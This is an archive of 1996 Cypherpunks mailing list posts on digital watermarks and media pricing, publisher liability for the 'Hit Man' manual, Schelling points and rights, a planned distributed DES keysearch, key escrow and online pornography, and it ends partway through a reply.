Subject: Re: Digital Watermarks (long, getting off-topic)
Message-ID: <ae1ba0b10a0210040674@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:14 PM 7/24/96, Gary Howland wrote:
>Timothy C. May wrote:
>
>> Pre-recorded DAT tapes were available for a while...they did not sell. I
>> believe this was because DAT machine purchasers were sophisticated and new
>> how to make CD-to-DAT copies, with or without SCMS.
>
>Don't forget that pre-recorded DAT tapes are at least an order of
>magnitude more expensive to manufacture than CDs.

The _selling_ price of DATs was only slightly higher than CDs, around $15
in the U.S. Some DATs were priced identically to CDs, and still didn't
sell.

(Not surprisingly to me, given the chicken-and-egg effect.)

Manufacturing costs of CDs are very low--I've seen estimates as low as 10
cents or less--and the final selling price is dominated by royalties,
overhead staff costs, distribution cost, and, of course, "what the market
will bear."

DAT manufacturing costs could be $1-2, but the above factors would still
dominate.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 25 Jul 1996 05:30:47 +0800
To: cypherpunks@toad.com
Subject: Re: When books are outlawed
Message-ID: <ae1ba2580b02100469ce@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:36 PM 7/23/96, Charley Sparks wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Only outlaws will have books...
>
>Just watching the news here in Fl. and they are trying to hold a publisher
>responsible for a murder because they published a fictional account of a
>hitman and a guy says he used the book to kill some people.
>
>Would you give your 6 year old a book ?
>
>This is really getting out of hand.. Anyone have any property for sale in
>Idaho ?

Deranged Mutant posted a summary of this on the list. (News item copied
below for reference.)

You have to be careful to separate out the issue of "lawsuits" from the
issues of "prior restraint" and "censorship." There is no talk of prior
restraint of Paladin Press, and no Office of the People's Censor to which
books must be submitted for approval.

Personally, I think holding authors responsible for other people's actions
is wrong-headed. It opens the door to such things as holding "Hustler"
responsible for rapes, "On Our Backs" responsible for scissor attacks,
"Guns and Ammo" responsible for accidental shootings, and, of course,
publishers of "The Bible" responsible for various acts of sodomy,
bestiality, patricide, and genocide.

"They made me do it!" should not be allowed to be a defense in criminal
cases, nor should publishers, writers, and speakers be held liable for
actions of others. (With the _possible_ of direct and immediate
exhortations to commit some serious crime, e.g., a speaker yelling at his
supporters to go burn down a building. And I am dubious even here;
certainly holding a leading American Neo-Nazi speaker and writer
responsible for the actions of someone influenced by him, actions committed
far away, was wrong. In my view.)

Here's the item supplied by Deranged Mutant:

>From LI Newsday today, p. 18:

  Suit Follows Muder by the Book
  Publisher of how-to 'Hit Man' manual is blamed in 3 killings

  The Associated Press

  (Greebvelt, Md.) - James E. Perry committed muder by the book.
  Now the book's publisher is accused of aiding and abetting his crimes.
      In a case that legal scholars say could set a precedent in First
  Amendment law if allowed to proceed, a federal judge yesterday said
  he would rule in 30 days on a motion against the publisher of "Hit
  Man: A Technical Manual for Independent Contractors".
  [..]
      The $10, 130-page book has sold 13,000 copies since it was
  published in 1983 by Paladin Press of Boulder, Colo., a small company
  that sells mostly through mail orders from its catalog.
  [..]


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 25 Jul 1996 07:54:25 +0800
To: cypherpunks@toad.com
Subject: Parsing John Youn (Re: OPS_nuk)
Message-ID: <ae1bb28d0c0210043878@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:30 PM 7/24/96, John Young wrote:
>   The WSJ Page Ones a loser's game about the CIA's role in
>   promoting Japanese pachinko cards to halt the surreptitious
>   funneling of betting cash to the construction of a North
>   Korean nuclear plant. And the op's nuking by the Kobe quake
>   looting of card-reading mechanisms, cracking encryption
>   codes, and counterfeiting not-so-smart cards for counter-
>   tipping the house fix. Mondex, watcher bleedin arse.


Huh?

(If anyone has a decryption key for this, please send it to me.)

--Tim

P.S. John Young does an invaluable service in forwarding items and making
them available at his site, but I find parsing his text into something
understandable a real chore. Too bad when style gets in the way of
substance, unless, of course, ones aspires to Joycehood.

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Thu, 25 Jul 1996 20:06:30 +0800
To: cypherpunks@toad.com
Subject: RE: [Noise] was Re: Givin
Message-ID: <TCPSMTP.16.7.25.4.17.0.2645935021.656029@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 In> I guess I don't really have to worry too much, though. It is illegal
 In> for children to possess such items publicly, and any parent who
 In> condones it is simply breaking the law. I don't blame the child, I
 In> blame the moronic parent who let's it happen.

     You would be suprised at what kids can get away with without their
     parents knowing...


 P.J.
 pjn@nworks.com


... Wndows is jst finefor bacgrond telcomncations.

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 25 Jul 1996 06:40:29 +0800
To: cypherpunks@toad.com
Subject: Schelling Points, Rights, and Game Theory--Part II
Message-ID: <ae1bb4100d021004937f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



As promised in Part I, here is more on the application of Schelling points
to the discussion of "rights" (property rights, rights of parents to tell
their children what to do, etc.).

We saw that Schelling points, as developed by Richard Schelling and others,
are essentially "lower entropy" points. (In fact, I suspect there are
formulations which involve so-called "maxiumum entropy" methods which would
reproduce the theory of Schelling points; Cover and Thomas hint at this in
their "Information Theory" book.)

How does this apply to rights?

Let us take as an example the contentious issue of "parent's rights,"
"children's rights," and societal issues involving schooling, child abuse,
indoctrination into the body politic, citizenship, etc.

* Viewpoint #1: Parents have absolute control of what their minor (under
some age, usually 18 and/or resident in their homes) children read, watch
on t.v., listen to on the radio, etc. They can control the comings and
goings of their minor children, whom they may associate with, etc.

* Viewpoint #2: Children, even minor children, have certain basic rights to
access to information, access to t.v., radio, music, and books. Even access
to crypto!

* Viewpoint #3: The State and/or Community has an interest in the
upbringing of a child and may take steps to direct the education and
exposure to information of children, even in contravention of the wishes of
parents.

There are of course various shadings of these viewpoints. And examples can
be found to defend each of these viewpoints, and also to attack them. (For
example, what of the Christian Scientist who lets his 5-year-old die of an
easily-curable disease because he believes injections are unGodly? What of
the 10-year-old who is taught in public schools how to use condoms (or how
to clean dirty needles), in contravention of the wishes of the parent?)

Cutting to the chase, I submit that nearly all societies have "evolved" an
approach that says:

-- "While I may think you are raising your child in a way different from
how I would raise him, I cannot take over the raising of your child, and I
cannot be in your house/tent/cave/yurt at all times, or even at _any_times,
so I will basically not interfere unless something really egregious
happens."

This is a "Schelling point" in the same way that territorial boundaries
develop and are mutually adhered to, for the most part.

The _costs_ of extending beyond the Schelling point boundaries is deemed to
be too high, and the boundary persists. (Boundaries may jump around, as
conditions change. And wars still exist to try to imbalance or move the
boundaries. Nothing says the Schelling points are fixed in stone, only that
the points are not completely random, and that there is a kind of order out
of the chaos.)

This is summarized in the most important of all Schelling points:

"Live and let live."

In the absence of a direct threat to one's self or family, and in the
absence of other compelling evidence of a need to intervene, much energy
and grief is saved by not trying to intervene in the lives of others.

(I believe many of the themes we talk about, here and in libertarian
circles, come together in this way. The view of John Rawls, that "justice"
is that which an ensemble of people of people would pick, even if they did
not what station in life they would be born into, closely fits with this
Schelling point model.)

ObCrypto Sidebar: The "fair" method for dividing a pie between two people
is well-known: "You cut, I choose." This *game theory* result is central to
many cryptographic protocols (though it may not always be apparent at
first). And the protocol can be extended to 3 parties, and proabably to N.
Research is ongoing on this, including Cypherpunk Robin Hanson's work at
Caltech.

My essay here is not a formal, footnoted proof of my claims, naturally. But
I believe my claims to be basically correct, and to offer insights into the
debate about "rights"...certainly a Schelling point or evolutionary game
theory interpretation of what we call "rights" is superior to an
appeal-to-God or "natural rights" interpretation.

To get back to the issue of children's rights: I will not expend my
energies and risk my life to forcibly gain entry to my neighbor's "castle"
to make sure his 7-year-old son is able to view "Power Rangers" when his
"rights" to do so are denied by his father. Nor will I pay for cops, Child
Protective Services, and a powerful bureaucracy to enforce these "rights."
Nor will I demand that this parent send his child to the church I deem most
appropriate, nor the school I deem most appropriate, etc.

That is, "practical and economic" issues lead me to the conclusion that
parents basically can tell their minor children what to do, and that only
truly egregious cases, such as clear cases of severe beatings, warrant the
interference by the State.

The same applies to cryptography. While there are dangers with any
technology, including cryptographers, most societies have eventually
evolved a system in which one is secure in one's home and papers. Orwell's
vision of video cameras in all homes (actually, only of the elites, as the
"proles" were unmonitored) has not come to pass, and even in nominally
totalitarian states like the U.S.S.R. and P.R.C. there was considerable
privacy in the home, at least after the worst of the terrors in the 1930-70
period. (I am not endorsing these states, naturally, just noting that even
these states had to recognize the Schelling points of (mostly) not trying
to send cops into private residences to enforce marginally-important
rules.)

Forceful advocates of children's rights, such as Mike Duvos, will no doubt
find many points to use to argue for intervention on behalf of children.
And in some case, I would even agree. But the basic principle, the "right"
of a man to control his own castle, and the "right" not to have people
nosing around inside his home, and the very real economic point that a
parent pays for services and good consumed in his house, means that the
balance of rights _must_ be in the direction of Viewpoint #1 above.

Parents are free to raise their children as they see fit. They feed and
clothe them, they talk to them about ideas and beliefs, they control the
television set and the radio channel tuned to, and so forth. This is basic
reality. To change this basic reality would require intervention from
outside. And this is too high a price to pay for illusory gains. (I say
"illusory" because I don't think intervention from outside would produce
better-educated children, though it might produce more controllable
citizen-units.)

This essay has concentrated perhaps too much on "parent's vs. children's
rights," but this is what sparked my desire to write an essay on Schelling
points and why certain so-called rights appear to have evolved. I believe
the game-theoretic and evolutionary approaches, mixed in with economics,
offer the most solid grounding for the discussion of rights.

Comments, as always, are welcome.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 25 Jul 1996 07:03:15 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Watermarks for copy protection in recent Billbo
Message-ID: <ae1bbff80e0210045f8c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:54 PM 7/24/96, Alex F wrote:
>> >Yes, but concievably if (whoever would be incharge, FBI?) *could*,
>> >under law do this, even if they are wrong.  It is a lot harder to
>> >prove that they intentionally harrassed *you* than it is for them to
>> >say that they were following leads and show evidence.  Yes, this may
>>
>> To go to trial, an indictment would be needed. How likely is this?
>
>The likelyness is irrelevant to the point.  Possibility is relevant.
>Probability is not.

"Likeliness" is _always_ relevent when discussing law.

I am not a lawyer, but I've virtually certain that "receiving stolen
property" laws involve terms like "knowingly" and/or "conspiracy." That is,
"scienter."

While "ignorance of the law is no excuse" is certainly true in many cases,
the law comprehends the reality that certain actions are not crimes if no
knowledge of a criminal act was involved. (Sorry if this is not phrased
more clearly.)

Thus, the guy who buys a bicycle that later turns out to have been stolen,
will usually lose the bicycle, but is not knowingly receiving stolen
property and hence is guilty of no crime. And no DA will charge him; the
courts and jails are already clogged up enough. Of course, if he _knew_ the
bicycle was stolen (e.g., he "placed an order" to have one stolen, a market
which actually exists in some places, usually for cars), then "scienter"
has been met, and perhaps "conspiracy," and so prosecution is more likely.

I maintain that this "wiggle factor" in the law is not something to get
worried about ("But they _could_ arrest me for buying a book stolen 10
years ago! We've got to do something!) and is, in fact, essential in any
justice system. There just is no "automated" or "formal" system, and
probably/hopefully never will be.

--Tim May



Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 25 Jul 1996 15:33:52 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: DES-Busting Screen Savers?
In-Reply-To: <199607240927.CAA18810@toad.com>
Message-ID: <Pine.LNX.3.94.960725045731.293B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 24 Jul 1996, Bill Stewart wrote:

> Date: Wed, 24 Jul 1996 02:24:58 -0700
> From: Bill Stewart <stewarts@ix.netcom.com>
> To: cypherpunks@toad.com
> Subject: Re: DES-Busting Screen Savers?
> 
> Tim and others have discussed the effectiveness of random search
> vs. centralized servers, problems of cheating, scaling, etc.
> My take is that, if you can ignore scaling, the best approach
> is probably to have a central server that doles out keyspace
> and wraps around when it reaches 100%, and doesn't worry too much
> about collecting results - even if there are cheaters, machine
> failures, etc., and people don't finish their keyspace,
> it'll be more likely to cover the whole space than randoms.
> (Make it a web page, and use cut&paste to transfer to the
> search programs so they don't need to be network-equipped.)
> 

Agreed.  Also, we might want to keep the plaintext on, say, a floppy disk,
as to discourage the recovery technique (which, admitidly, is easier than
actually cracking the key).  I might suggest, also, to put the disks in
the hands of someone who has little or no reason to help.  Sadly, the best
person for the job that _I_ can think of would have to be "Dr." Dave.

> 
> To support scaling, make it easy for people to run subset servers;
> grab a chunk of keyspace from the main server and dole it out
> to people who ask you for it.  If you want to get fancy,
> hack a DNS server to allow people to register their machines
> as NNN.descrack.org, 0<=NNN<1000, so that people can find 
> subsets without having to ask the main server.
> 

Or hack it to use a 56 bit IP netmask-ish thing, and keep track of keys
that way (i'm not endorsing this idea, just pointing it out)

 --Deviant
"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.
           Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfb/oTAJap8fyDMVAQFBAQf8DV1YEpKvyVp6zrotThJ7YMjcFIsJnq+g
/myED4a4KgB6TmArFnPocQlCQXMyKo6KNKupYzyHppINWgkftrKBFgh1Uu3zVL3e
r0K9lsf55XVyEVLUdu1lKOJX4Thh+9NePXjF7SrMXAMR/3czvUs+NqDs8wMzkiPX
lLYV+9WVJFR7J+rLtonL2V4MyPkYFH1oV+2ajO44fWMvll6d64TmQMSZZmlFw2b5
H86AHFsPhOicBfQGYcn9m1tw8HVauQdWN1k7GR0yOLRZ+YP635K2PClcJ2uS0mF/
Tw0kqWo2rUYJpanznvBJbSeSe1HRVf4KNmq0G20ZI9k6TG5X7v1Rug==
=igpG
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 25 Jul 1996 16:11:43 +0800
To: Steve Reid <root@edmweb.com>
Subject: Re: Brute-forcing DES
In-Reply-To: <Pine.BSF.3.91.960723151253.191A-100000@bitbucket.edmweb.com>
Message-ID: <Pine.LNX.3.94.960725053348.293C-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 
> Even with a bunch of DES chips and a massive legion of PCs, this is going
> to take a long time. Perhaps we should be looking at the thousands of
> computers and many months, more like the RSA-129 crack than the RC4-40
> crack. 
> 

Yes, this thought has crossed my mind also, and should be seriously
considered.  Rather than trying the 1-month method, we'll certainly have a
better shot trying for 1-year.

 --Deviant
"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.
           Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfcH0TAJap8fyDMVAQHzewf/RJBebwn2eDKRiUf5fvdlprxiPQ/sLoZz
q7Is1dCmI09azBWN/ljqoyZBMvoqVtx12gMqcBIoW/rXJtERm9yRWDwtBVaExxQc
LU+v7JpeAVe0SckY+D2WJga8ydTlaXwr6HvGV/P+AJcRZHtljn5jOn3YB1v36yWW
SqqU2iPJptOkudu5LGQAmS6H7yVz1s9Z/b8jKVJAHKwUdJ1146TpVreHYqnH53D8
csuwL3nSWnodDvTNc3fFgX8hfRe1ZxGzaObmrwmSfRkeBf9bT5yHyj8cCH1obLxC
4bHq7fHK8Q4DY22Bl0s/jEoJhSItpAcJnvrU26WzFkW7HDP2+oIHqQ==
=6Mb8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 25 Jul 1996 21:15:03 +0800
To: cypherpunks@toad.com
Subject: [Rant]Re: Shell buys key escrow system from TIS
Message-ID: <199607251021.GAA33226@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Will Rodger,<rodger@interramp.com>
Washington Bureau Chief of Inter@ctive Week, wrote:

<snips>

>Administration officials didn't return calls for comment, but it's clear
>that the Clinton-Gore team have their first "testbed" for trying out key
>recovery, or key escrow, proposals.

Hmmm.  A new meme, "key recovery" is lots better than "key escrow," but
I still wonder if I'm ever gonna see a journalist say, "'GAK,' or Govt.
Access to Keys for cryptography."

>...The multinational company will self-escrow, that is handle
>all encryption keys itself, in cooperation with the British government,
>sources close to the deal said.

I'm left wondering about a few cooperation-with-the-corporation issues
here regarding the Brit.govt, but I suppose time will tell how much of
Orwell is coming true in his own homeland. 

>Walker declined to name the company, but several Washington-based sources
>confirmed the buyer is Royal Dutch Shell.

Largest corporation in the world, if I'm not mistaken.

>The deal represent the first time that a foreign buyer has purchased a US
>key escrow product  without escrowing keys in the US. ...

[I can hear Gore/Gorelick now, "Well, as long as it goes to SOME big
government (with a road-to-serfdom track record in economic freedom)
it's OK by me!"]

>Walker, widely credited with devising the controversial commerical key
>escrow system now being promoted by the current administration, claimed
>"there really is an important issue here in finding a balance between the
>interest of government and those of industry. ...

I suppose we will hear after the election of the balance between the
interests of government and those of indIVIDUALS. I always see this
image of me, sitting on one end of a see-saw, with former congressman
Rostenkowski on the other end.
JMR

PS Anyone who has had the pleasure of meeting my pal Joey Grasty
would NEVER question his cypherpunk (or U.S.) patriotism.

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"It is long past time to end the laughable presumption that voters
 who can easily cope with the choices offered at Burger King are
 somehow 'confused' by more than two choices at the voting booth."
 -- me, in the Miami Herald, June 24, 1996, p. 10A.

 Defeat the Duopoly! Vote "NOTA," not Slick/Dull in November.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray Coming
soon, the "Pennies For Perot" page. Keep billionaires off welfare!
___________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMfdJNm1lp8bpvW01AQGLOAQAkHzibmIw8OKsbUqFjRXy/MrkVhszA+8l
z+RmUoLy52D85ZpTsSivwyPGybeAyTs/V3IGiZx8WX8tBIIdyiFHNWlesjsShiro
sTVx+a8qXZ1NSS8KMIScfqh3piXjnDJWeDqbFsZAM+JvHIREzASSrky2Xhb0/fIv
ITuwCG7P22A=
=2+iV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 25 Jul 1996 22:35:42 +0800
To: frissell@panix.com (Duncan Frissell)
Subject: Re: Digital Watermarks (long, getting off-topic)
In-Reply-To: <2.2.32.19960725002302.008aeae0@panix.com>
Message-ID: <199607251227.HAA04664@homeport.org>
MIME-Version: 1.0
Content-Type: text


Duncan Frissell wrote:
| At 10:26 AM 7/24/96 -0800, jim bell wrote:
| 
| >Isn't it odd that when music is sold, CD's are MORE expensive than cassette 
| >tapes, even though you _know_ that the manufacturing cost of CD's is less?
| 
| CDs sell for more because buyers decided that they wanted a wider range of
| titles with shallower sales (hence higher unit costs) rather than a narrower
| range of titles with lower sales prices.  The number of CD titles available
| is far greater (in general distribution) than the number of vinyl titles
| that were available during vinyl's peak year.  This greater availability of
| short run pressings raises average unit sales costs justifying the higher
| prices.  Had the market decided (when physical production costs fell) that
| it was satisfied with a Top-40 CD stock, average CD prices would have fallen
| to vinyl levels.

	Thus, my desire to listen to the Drummers of Burundi justifies
a cost of $16.99 for the latest REM album?  If I want the wide range
of African music thats now available (and I do), then I should be
willing to pay a premium to get it.  No reason for Alanis Morisette
fans to subsidise those of us with musical taste.

	Except for collusion on the part of the major record
companies, who have a price called the 'MAP,' or minimum access price,
under which they won't provide advertising for the record & store.
Those MAPs sit between 10.81 & 10.88 for the biggest six record
companies.  Theres a lawsuit in process now to decide if there is
collusion occuring.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 25 Jul 1996 13:19:13 +0800
To: molecul1@molecule1.com (Molecule One Scientific Research Institute)
Subject: Re: A Global Village, or the future of porn on the net
Message-ID: <1.5.4.32.19960725020424.002eb03c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 10:00 24/07/96 +0000, Alex F wrote:
>
>why is it that Bill(ary) signed an unconstitutional law?  I 
>am referring to the CDA and the telephony bill. 

... arguments that I wholeheartedly support deleted..

>Anyway, getting off-topic again.  I'll be quiet now :)

Let me see if I can bring this back on track. We have some interesting
developments that could converge:

1) Legally, the Internet is more or less in the clear as far as indecency
is concerned. The moralists will rally again and put through a bill that
doesn't so blatantly violate the constitution, but for the time being
we're OK.

2) Porn is very, very popular. As a consultant, I often use Netscape from
the offices of my clients, and invariably take a peek at the bookmarks. 
Guess what is  pointed to more than anything else. By making a hullaballoo
about porn on the net, its enemies may have shot themselves in the foot:
it will attract people rather than repel.

3) Porn on the net by and large isn't all that great, so if there is a risk, 
it is that people might be bored. What you mostly have are stills of nudes
on the web and Usenet postings of indifferent quality.

4) the web is changing from static to dynamic through Java and the like. 
VRML in fact adds a 3-D element.


Stir, add some spicy curry, and see if you get:

Java classes for males and females corresponding to VRML
objects. The class methods might include kissing, hugging,
spanking, restraining...

A female object might be  initialized with Hillary Clinton's face, Evangelista's
body... 

Anyone could now write a script which you could view enacted on
your screen, or interact with one another as in MUDs. Why,
someone might write a translator 
that takes a story off alt.sex.whatever and produces
an appropriate script. People would only need to download the software and
appropriate objects once, then receive emscripts which could be
run in total privacy.
People should we willing to pay small amounts for use of the
classes and objects,
as well as for the scripts. Of course, it would only work in our
prudish societies if
the transactions were totally anonymous. If Digicash payment
systems were built-in,
that might be a reason for people to start adopting eCash.

Of  course, this opens up a whole can of worms. For instance,
given the violence of
many pornographic stories on Usenet, it won't be long before
famous personalities
routinely get violated in cyberspace. Talk about copyright: do
you have the right
to prevent someone from doing this to you?

I unfortunately lack  the bandwidth to find out the extent to
which porn on the net
is already moving in this direction. However, if you have
pointers, I'll go *find*
the bandwidth! Where on the net do people discuss such matters?
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 26 Jul 1996 00:02:18 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 3.0B US version MD5
In-Reply-To: <199607250805.BAA27161>
Message-ID: <FTFmRD20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@c2.org (Anonymous User) writes:
> (If you have a "wish list" there, a native OS/2 version of Netscape
> would be nice, too! <g>)

Me too!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 26 Jul 1996 03:06:03 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Watermarks for copy protection in recent Billbo (fwd)
In-Reply-To: <199607250621.BAA07021@einstein.ssz.com>
Message-ID: <199607251521.IAA06190@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate <ravage@einstein.ssz.com> writes:

 >> The Sampling Theorem states that equally spaced
 >> instantaneous samples must be taken at a rate GREATER THAN
 >> twice the highest frequency present in the analog signal
 >> being sampled.  If this is done, the samples contain all the
 >> information in the signal, and faithful reconstruction is
 >> possible.

 > Actualy the sampling theorem states that if you want to
 > reproduce a signal reliably it must be sampled at a
 > frequency AT LEAST TWICE that of the highest frequency of
 > interest in the FFT of the signal. This means the signal
 > must be deformable into sine waves, not all signals qualify
 > for this particular limitation and in general are not good
 > signals for sampling.

You want a continuous Fourier transform, not a discrete one, to
determine the frequency spectrum of the waveform being sampled.
The FFT is simply an algorithm for computing the DFT without
redundant computation.  In general, any Lebesgue integrable
complex function will have a Fourier transform, even one with a
finite number of discontinuities. The reverse transform will
faithfully reproduce the function, modulo the usual caveats about
function spaces and sets of measure zero.

There is no meaningful difference between speaking of the highest
frequency in a signal, and the highest frequency present in its
Fourier transform.

 > An example is a step change from v1 to v2. since there is
 > no change in voltage except for a brief moment the output
 > of the FFT is pretty much flat.

The Fourier transforms of step functions, square wave functions,
delta functions, and other oddities are perfectly well defined.
Again, the FFT is not relevant here.  A step function does not
have a upper cutoff in the frequency domain, so you can never
reproduce it perfectly from its samples, although the faster you
sample, the sharper the edges of the reconstruction will become.

 > What comes out the other end looks like a spike (similar to
 > what happens when you feed a square wave to a transformer
 > and look at the output). If you reconstruct this via the
 > sampling theorem you get a sign wave of extremely low
 > amplitude and frequency.

I don't think so.

[Incomprehensible Deletia]

 > Back to the comb. Where a given signal has a componant leave
 > the teeth. Where there is no componant break them off. You
 > are left with a ratty looking comb. Now to each of the
 > remaining teeth assign an amplitude for that specific
 > frequency that is consistent with the FFT you calculated.
 > The way this FFT is implimented in practice is called a
 > 'Comb Filter' where it samples the signal (wide bandwidth)
 > over a set of very small bandwidth filters in parallel.

I must have been absent on "tooth day" in Functional Analysis
class.

 > One of the basic ideas of Algebra is that any given curve
 > can be explained by a arbitrary set of equations. The
 > Sampling Theorem just gives you a rationale for picking from
 > that set.

AIIIIIIIIEEEEEEEEEEEEE!  (I feel much better now :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 26 Jul 1996 03:07:01 +0800
To: cypherpunks@toad.com
Subject: One of the biggest problems with freedom
Message-ID: <199607251523.IAA06095@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



What our biggest problem is, is that people want the
government to protect them from the oh so evil terrorists,
and they will willingingly have shackles put on them,
and rejoice when it is done.

I know people who WANT the government to take away their
rights for security, and its a lot of people, and its
far too many people.

Example:  "I don't care if the government has my keys
for encryption.  I don't do anything wrong, and if it
helps FBI enforce our just laws, I am all for it.  Since
anyone who tries to get keys without legal means will end
up in Leavenworth for the rest of their life, there is
no problems with people getting access to those things."

When I try to refute the logic:

"I don't care about the bill of rights... I don't want to
have to split my family up on separate flights so there is
a chance of some of them arriving without dying.  I want
the security of knowing I can fly okay without being
blown up, thank you very much.  Signapore has little or
no crime since the people give up their rights for a common
good."

Problem with freedom is people don't use it... and like
a limb, will wither and fall off if not used.

Our basic item should be trying to get the masses to figure
out that freedom is important and should not be construed
as a gift from the government.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 25 Jul 1996 23:21:41 +0800
To: cypherpunks@toad.com
Subject: Re: Parsing John Youn (Re: OPS_nuk)
Message-ID: <2.2.32.19960725122659.0069a64c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim asked for a translation.  I thought it was one of John's more
declarative summaries.  It this case, it's reality that's skewed.  Voila:

>At 3:30 PM 7/24/96, John Young wrote:
>>   The WSJ Page Ones a loser's game

There is an article on the first page of the Wall Street Journal about
financial losses...

>>   about the CIA's role in
